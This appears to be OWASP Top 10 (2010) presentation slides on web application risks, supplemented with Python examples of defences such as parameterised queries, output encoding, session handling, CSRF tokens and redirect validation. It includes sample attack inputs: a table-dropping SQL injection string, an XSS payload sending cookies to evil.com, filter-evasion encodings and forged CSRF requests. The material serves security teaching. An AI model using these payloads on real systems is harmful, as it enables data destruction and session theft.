OWASP top 10 - Agenda
• Background
• Risk based
• Top 10 items 1 – 6
• Live demo
• Top 10 items 7 – 10
• OWASP resources

Warning
• Risk analysis
• Insiders
• Architecture
• Modular
• Clarity
• SDLC
• Knowledge
• Predictability
Top 10 - 2010
• Injection
• Cross site scripting (XSS)
• Broken authentication and session management
• Insecure direct object reference
• Cross site request forgery (CSRF)
• Security misconfiguration
• Insecure cryptographic storage
• Failure to restrict URL access
• Insufficient transport layer protection
• Unvalidated redirects and forwards
A1 – Injection
(diagram: Client → Appl → DB / Shell / Pgm / CPU)

A1 – Injection
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";
id="foo"
  SELECT * FROM accnts WHERE ID='foo';
id="foo';DROP accnts;--"
  SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
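The slide shows why string concatenation is the problem; the fix is to keep the SQL text fixed and send the value as a bound parameter. The following is an added example, not code from the slides, written in Python against an in-memory SQLite database (the `accnts` table and its rows are constructed sample data). It builds the same vulnerable query string the slide shows, and then performs the lookup with a parameterised statement so that the slide's second input is treated as an account ID that happens to contain quotes, nothing more.

```python
import sqlite3


def make_db():
    """Constructed sample database for the demonstration (not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accnts (ID TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accnts VALUES (?, ?, ?)",
        [("foo", "alice", 100), ("bar", "bob", 250)],
    )
    conn.commit()
    return conn


def build_query_vulnerable(account_id):
    """Mirrors the slide: the request parameter becomes part of the SQL text,
    so a quote character in the input changes the structure of the statement."""
    return "SELECT * FROM accnts WHERE ID='" + account_id + "'"


def lookup_account_safe(conn, account_id):
    """Hardened form: the statement is fixed and the value is bound as a
    parameter. The database never parses the input as SQL, whatever it contains."""
    cur = conn.execute("SELECT * FROM accnts WHERE ID = ?", (account_id,))
    return cur.fetchall()


def table_exists(conn, name):
    cur = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    )
    return cur.fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "foo';DROP accnts;--"  # the slide's second input value
    print(build_query_vulnerable(payload))  # the statement the slide warns about
    print(lookup_account_safe(conn, payload))  # [] : no account has that literal ID
    print(lookup_account_safe(conn, "foo"))  # [('foo', 'alice', 100)]
    print(table_exists(conn, "accnts"))  # True : the table is untouched
```

Binding applies equally to JDBC (`PreparedStatement` with `setString`), which is the direct counterpart of the slide's Java snippet; the point is that the query text and the data travel separately, so no escaping logic in application code is needed.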
A2 - Cross site scripting (XSS)
(diagram: Browser → Appl → DB → Browser)

A2 - Cross site scripting (XSS)
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";
CC="123456789"
  <input name='cc' value='123456789'>
CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>
  <input name='cc' value='123456789"><script>window.location=http://evil.com?x=document.cookie</script>'>

A2 - Cross site scripting (XSS)
Alternative encodings of "<" that a naive filter misses: %3C  \x3c  \x3C  \u003c  \u003C
<img src=http://site.com onmouseover=
<body onload=
<IMG SRC=jAvascript:alert('test2')>
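The two XSS slides make one combined point: pasting a parameter into markup lets the value close the attribute and start a tag, and trying to catch that by looking for "<" in the raw input fails because the same character has many encoded spellings. The defence is to encode for the output context, at output time. The following is an added example, not code from the slides: Python's `html.escape` stands in for the Java encoder (ESAPI's encoder does the same job), and the naive filter is a constructed contrast, not something the slides recommend.

```python
from html import escape
from urllib.parse import unquote


def render_cc_field_vulnerable(cc):
    """Mirrors the slide: the parameter is pasted straight into the HTML."""
    return "<input name='cc' type='TEXT' value='" + cc + "'>"


def render_cc_field_safe(cc):
    """Hardened form: HTML-attribute-encode at the point of output.
    quote=True encodes both quote characters, so the value can never
    terminate the attribute it is placed in, and < > & are encoded too."""
    return "<input name='cc' type='TEXT' value='" + escape(cc, quote=True) + "'>"


def naive_filter_allows(raw_param):
    """A blacklist on the raw parameter: rejects a literal '<' only.
    Shown to demonstrate the evasion slide; this is NOT a defence."""
    return "<" not in raw_param


def canonical_then_encode(raw_param):
    """Decode the transport encoding once (URL percent-encoding here), then
    encode for the HTML context. Validation, if any, belongs between the two."""
    return escape(unquote(raw_param), quote=True)


def contains_script_tag(markup):
    return "<script" in markup.lower()


if __name__ == "__main__":
    payload = '123456789"><script>window.location=http://evil.com?x=document.cookie</script>'
    print(render_cc_field_vulnerable(payload))
    print(render_cc_field_safe(payload))
    # the slide's %3C spelling passes a raw-string blacklist but is neutralised by encoding
    print(naive_filter_allows("%3Cscript%3E"), canonical_then_encode("%3Cscript%3E"))
```

The encoder must match the context: attribute values, element text, JavaScript string literals and URLs each need a different encoding, and the `jAvascript:` example on the slide is why a URL-typed attribute such as `src` additionally needs its scheme checked against an allow list rather than merely encoded.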
A3 - Broken authentication and session management
• Unpredictable passwords, session IDs and security questions
• No session IDs or credentials in the URL
• Avoid session fixation
• Session time-outs and logout buttons
• Different session IDs outside and inside TLS
• No clear-text passwords
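The bullets above describe properties of a session mechanism; the following is an added example, not code from the slides, of a minimal server-side session store in Python that has them: IDs come from the operating system's CSPRNG so they are unpredictable, the ID is replaced when the user authenticates (which is what defeats session fixation), idle sessions expire, logout destroys the session, and the ID is carried in a cookie with `Secure` and `HttpOnly` set rather than in a URL. The 15-minute idle timeout and the `SID` cookie name are constructed assumptions; the `now` parameter exists so the clock can be controlled in tests.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Optional

IDLE_TIMEOUT = 15 * 60  # seconds; constructed policy value for the example


@dataclass
class Session:
    user: Optional[str]  # None until the user has authenticated
    created: float
    last_seen: float


class SessionStore:
    """Server-side session store keyed by an unpredictable session ID."""

    def __init__(self, now=time.time):
        self._now = now
        self._sessions = {}

    @staticmethod
    def _new_id():
        # 32 random bytes from the OS CSPRNG, URL-safe base64 encoded:
        # far too large a space to guess or enumerate.
        return secrets.token_urlsafe(32)

    def create(self):
        """Anonymous (pre-login) session."""
        sid = self._new_id()
        t = self._now()
        self._sessions[sid] = Session(user=None, created=t, last_seen=t)
        return sid

    def login(self, old_sid, user):
        """On authentication, discard the pre-login ID and issue a fresh one.
        An ID planted in the victim's browser before login (session fixation)
        therefore never becomes an authenticated session."""
        self._sessions.pop(old_sid, None)
        sid = self._new_id()
        t = self._now()
        self._sessions[sid] = Session(user=user, created=t, last_seen=t)
        return sid

    def get_user(self, sid):
        """Authenticated user for this ID, or None if unknown, anonymous or idle
        for longer than IDLE_TIMEOUT (expired sessions are removed on access)."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._now()
        if now - s.last_seen > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        s.last_seen = now
        return s.user

    def logout(self, sid):
        """The logout button must invalidate server-side, not just clear the cookie."""
        self._sessions.pop(sid, None)


def session_cookie_header(sid):
    """Secure: never sent over plain HTTP. HttpOnly: not readable by page script.
    SameSite=Lax: not attached to cross-site POSTs. The ID never appears in a URL."""
    return f"Set-Cookie: SID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

The fifth bullet (different IDs outside and inside TLS) is the same rotation idea applied at the HTTP-to-HTTPS boundary: any ID that was ever exposed on a plain-text connection must not be accepted for the authenticated part of the site.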
A4 - Insecure direct object references
<SELECT name=period>
  <OPTION>2010q1</OPTION>
  <OPTION>2011q2</OPTION>
</SELECT>
period=2011q2
period=2011q3
A5 - Cross-site request forgery (CSRF)
<img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
  <input type="hidden" name="sp" value="8109"/>
</form>
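Both forged requests on the slide succeed because the browser attaches the victim's session cookie automatically and the server asks for nothing the attacker's page cannot supply. The standard fix is the synchronizer token pattern: a per-session random token that is embedded in every state-changing form and checked on submission. The following is an added example, not code from the slides, in Python; the `session` dict stands in for whatever server-side session object the application uses, and the form field name `csrf_token` is an assumption. It also refuses state changes over GET, which is what the `<img>` variant relies on.

```python
import hmac
import secrets


def issue_csrf_token(session):
    """One unpredictable token per session, kept server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def render_transfer_form(session):
    """The token goes into the form as a hidden field. A cross-site page cannot
    read it (same-origin policy), so it cannot reproduce a valid submission."""
    token = session.get("csrf_token") or issue_csrf_token(session)
    return (
        '<form method="POST" action="https://bank.com/fn">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}"/>\n'
        '  <input type="hidden" name="sp" value="8109"/>\n'
        "</form>"
    )


def verify_csrf(session, form):
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    # constant-time comparison: do not leak how much of the token matched
    return hmac.compare_digest(expected.encode("utf-8"), submitted.encode("utf-8"))


def handle_transfer(session, method, form):
    """Returns the HTTP status the transfer endpoint would answer with."""
    if method != "POST":
        return 405  # state changes never happen on GET, so an <img> fetch does nothing
    if not verify_csrf(session, form):
        return 403  # cookie alone is not proof the user intended the request
    # ... perform the transfer here ...
    return 200
```

The cookie attribute `SameSite=Lax` (or `Strict`) is a useful second layer because it stops the browser sending the session cookie on cross-site POSTs in the first place, but the token check is what the server can actually enforce regardless of client behaviour.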
A6 - Security misconfiguration
• Patching
  • OS
  • Application
  • Frameworks / libraries
• Disable unnecessary services
• Stack traces
• Configuration
A7 - Insecure cryptographic storage
• Keep track of sensitive data
• Passwords one-way hashed and salted
• Password/key management
• TLS key pass phrase
• M2M passwords (obfuscation)
A8 - Failure to restrict URL access
/user/getAccounts
/admin/getAccounts
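A4 and A8 are the two halves of server-side authorization: A4 is about which object (the `period` value) the caller may read, A8 about which function (the `/admin/...` path) the caller may invoke. In both cases the page having offered only certain options is not a control, because the client can send anything. The following is an added example, not code from the slides, that enforces both checks on every request in Python; the users, roles, report data and role-to-path table are constructed sample data.

```python
from dataclasses import dataclass
from typing import FrozenSet


@dataclass(frozen=True)
class User:
    name: str
    role: str                # "user" or "admin" (constructed roles)
    periods: FrozenSet[str]  # report periods this user is entitled to read


# Constructed sample data, not from the slides.
REPORTS = {
    "2010q1": "Q1 2010 report",
    "2011q2": "Q2 2011 report",
    "2011q3": "Q3 2011 report (unpublished)",
}

# A8: which roles may call which paths. Checked on every request; a path that is
# simply not linked from the menu is not protected.
ROUTE_ROLES = {
    "/user/getAccounts": {"user", "admin"},
    "/admin/getAccounts": {"admin"},
}


class Forbidden(Exception):
    pass


def authorize_route(user: User, path: str) -> None:
    """Function-level check. Unknown paths are denied, not allowed by default."""
    allowed = ROUTE_ROLES.get(path)
    if allowed is None or user.role not in allowed:
        raise Forbidden(f"{user.name} ({user.role}) may not call {path}")


def get_report(user: User, period: str) -> str:
    """Object-level check (A4): the submitted period is compared with this user's
    entitlements, not with the <OPTION> list the page happened to render."""
    if period not in user.periods:
        raise Forbidden(f"{user.name} may not read {period}")
    report = REPORTS.get(period)
    if report is None:
        raise KeyError(period)
    return report


def handle(user: User, path: str, period: str) -> str:
    """Request handler: route authorization first, then object authorization."""
    authorize_route(user, path)
    return get_report(user, period)
```

An alternative for A4, which OWASP ESAPI provides as an access reference map, is to never expose the real object identifier at all and instead hand the client a per-session indirect key that the server maps back to the object; the entitlement check above is still required, the indirection just removes guessable identifiers from the wire.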
A9 - Insufficient transport layer protection
• Use SSL/TLS
• No mixed content
• Use secure cookies
• Example: Firesheep exploits weak implementations
A10 - Unvalidated redirects and forwards
• http://www.vuln.com/redir.asp?=http://www.links.com
• http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
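The two URLs on the slide show a redirect parameter that accepts an arbitrary destination, and the same destination percent-encoded so that a check on the raw string would not recognise it. The following is an added example, not code from the slides, of validating a redirect target in Python: the value is decoded once, parsed, and accepted only if it is a relative path on this site or an absolute `https` URL to one of the application's own hosts; anything else falls back to a fixed default. The allowed host `www.example.com` and the default target `/` are constructed assumptions.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"www.example.com"}  # constructed: the application's own host(s)
DEFAULT_TARGET = "/"


def safe_redirect_target(target):
    """Return a redirect destination that stays on this site, or DEFAULT_TARGET."""
    if not target:
        return DEFAULT_TARGET
    # Canonicalise once before inspecting: the slide's second URL is the first
    # one's host spelled in percent-encoding, and must be judged after decoding.
    decoded = unquote(target)
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        # Absolute URL (urlsplit also puts a scheme-relative //host here):
        # only our own hosts, only over https.
        if parts.scheme == "https" and parts.netloc.lower() in ALLOWED_HOSTS:
            return decoded
        return DEFAULT_TARGET
    # Relative target: must be a single-slash path; backslashes are rejected
    # because some browsers normalise them to forward slashes.
    if not decoded.startswith("/") or decoded.startswith("//") or "\\" in decoded:
        return DEFAULT_TARGET
    return decoded


if __name__ == "__main__":
    for t in ["/account/summary", "http://www.links.com",
              "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D",
              "https://www.example.com/home"]:
        print(t, "->", safe_redirect_target(t))
```

Where the set of destinations is known in advance, the stronger design is to pass an index or short name in the parameter and look the URL up server-side, so no URL is ever taken from the request at all.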
OWASP resources
• OWASP Secure Software Contract Annex
• OWASP Developer's Guide
• OWASP Enterprise Security API (ESAPI)
• OWASP Software Assurance Maturity Model (SAMM)
• OWASP WebGoat